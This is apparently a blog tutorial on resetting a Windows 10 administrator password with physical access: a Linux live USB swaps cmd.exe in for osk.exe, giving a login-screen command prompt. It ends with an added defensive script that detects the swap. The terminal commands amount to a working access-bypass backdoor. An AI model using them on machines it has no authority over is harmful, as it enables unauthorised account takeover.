Hacking a Windows 10 administrator password

Irreplaceable, priceless music or video files could be yours again, if you know what to do next.

Maybe you just forgot your own password…

If you are in physical possession of a Windows machine, you can easily reset its passwords with a small amount of technical direction, provided the system drive is not protected by full-disk encryption such as BitLocker, which is the standard defence against exactly this kind of offline tampering.

Download Ubuntu 16.04.05 GNOME LTS

Download Linux onto a non-target Windows system. If you prefer another Linux distro, feel free to use it. The important requirement is that it has a Live or Test mode, so you can run Linux from the USB drive (2GB+) without installing it on a hard drive.

Create a bootable USB drive on Windows

Again, do this on a non-target Windows system.

Shut down Windows with the Shift key

Do this on the actual target Windows system whose password you need to replace. Hold the Shift key down and select Shutdown. Holding Shift is important: it forces a full shutdown instead of the hybrid (Fast Startup) shutdown that leaves the drive in a hibernated state. If you skip this, Linux may refuse to mount the NTFS volume, or mount it read-only.

Insert the USB drive into the target system

Boot from the USB drive: immediately after powering on, tap Escape (the boot-menu key varies by manufacturer) until the boot device menu appears, then select the USB drive.

Start a Linux terminal session.

$ sudo fdisk -l                  # find the Windows (NTFS) partition, e.g. /dev/sda1
$ cd /media                      # cd is a shell builtin, so it is not run through sudo
$ sudo mkdir mnt
$ sudo mount /dev/sda1 mnt       # substitute the partition name you found with fdisk above
$ cd mnt/Windows/System32        # case is important on Linux
$ sudo cp -a osk.exe osk.exe.orig   # back up the On-Screen Keyboard binary
$ sudo cp -a cmd.exe cmd.exe.orig   # back up cmd.exe too, so both can be restored later
$ sudo cp cmd.exe osk.exe           # put a copy of cmd.exe in place of osk.exe

Exit and shut down the Ubuntu session, then remove the USB drive.

Boot the target Windows system

  • Select the Ease of Access icon on the login screen.
  • Next select the On-Screen Keyboard.
  • This launches the copy of cmd.exe that now sits in place of osk.exe and brings up a command prompt without any user having signed in.
  • Now you can type ‘net user’ to show all user accounts.
  • Then type ‘net user Administrator *’ to reset the password for Administrator, as an example.
  • Do this for each account you need, then log in with the new password; you should be set.

Be sure to restore the originals afterwards (copy cmd.exe.orig back to cmd.exe and osk.exe.orig back to osk.exe) to undo the backdoor you created; until you do, anyone who reaches the login screen gets a privileged command prompt without a password.
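The following is an added defensive check, not part of the original guide. Run it from the Linux live session against the mounted System32 directory (or on any Windows image you are auditing) to confirm that the On-Screen Keyboard binary is not a copy of cmd.exe and that no *.orig backups from this procedure were left behind. It assumes sha256sum from coreutils; the directory path and the helper names are arguments you supply.

```shell
#!/bin/sh
# Detects the swap described above: an accessibility helper in System32
# that is byte-identical to cmd.exe, plus leftover *.orig backups.
# Usage: check_accessibility_binaries /media/mnt/Windows/System32 [helper ...]
# Defaults to checking osk.exe. Returns 0 when clean, 1 when a helper has
# been replaced by cmd.exe, 2 when cmd.exe itself cannot be hashed.
# Assumes sha256sum (coreutils) is available.

sha256_of() {
    sha256sum "$1" | cut -d' ' -f1
}

check_accessibility_binaries() {
    sys32="$1"
    shift
    [ $# -gt 0 ] || set -- osk.exe
    cmd_hash=$(sha256_of "$sys32/cmd.exe") || return 2
    [ -n "$cmd_hash" ] || return 2
    status=0
    for helper in "$@"; do
        if [ ! -f "$sys32/$helper" ]; then
            echo "missing: $helper"
            continue
        fi
        if [ "$(sha256_of "$sys32/$helper")" = "$cmd_hash" ]; then
            # Same bytes as cmd.exe: the backdoor is in place.
            echo "REPLACED: $helper is byte-identical to cmd.exe"
            status=1
        else
            echo "ok: $helper"
        fi
    done
    # The procedure leaves .orig backups next to the binaries; flag them.
    for backup in "$sys32"/*.orig; do
        if [ -e "$backup" ]; then
            echo "warning: leftover backup $backup (restore it, then delete it)"
        fi
    done
    return "$status"
}
```

A clean system prints only "ok:" lines and exits 0; a non-zero exit is the signal to restore from the backups (or from a known-good Windows image).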


